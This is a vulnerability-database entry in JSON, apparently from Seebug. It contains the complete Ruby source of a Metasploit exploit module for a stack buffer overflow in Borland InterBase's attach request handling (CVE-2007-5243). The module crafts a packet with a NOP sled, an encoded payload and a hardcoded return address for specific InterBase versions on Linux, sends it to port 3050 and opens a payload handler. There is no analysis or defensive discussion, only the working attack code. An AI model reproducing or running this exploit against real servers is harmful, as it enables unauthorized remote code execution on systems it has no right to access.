Description
No description provided by source.
{"lastseen": "2017-11-19T16:10:20", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "href": "https://www.seebug.org/vuldb/ssvid-71340", "references": [], "enchantments_done": [], "id": "SSV:71340", "title": "Borland InterBase PWD_db_aliased() Buffer Overflow", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 5, "sourceData": "\n ##\r\n# $Id: ib_pwd_db_aliased.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => "\\x00\\x2f\\x3a\\x40\\x5c",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\tlength = 1152\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << "\\x00" * padding\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-71340", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645286450, "score": 1659785532}}
{}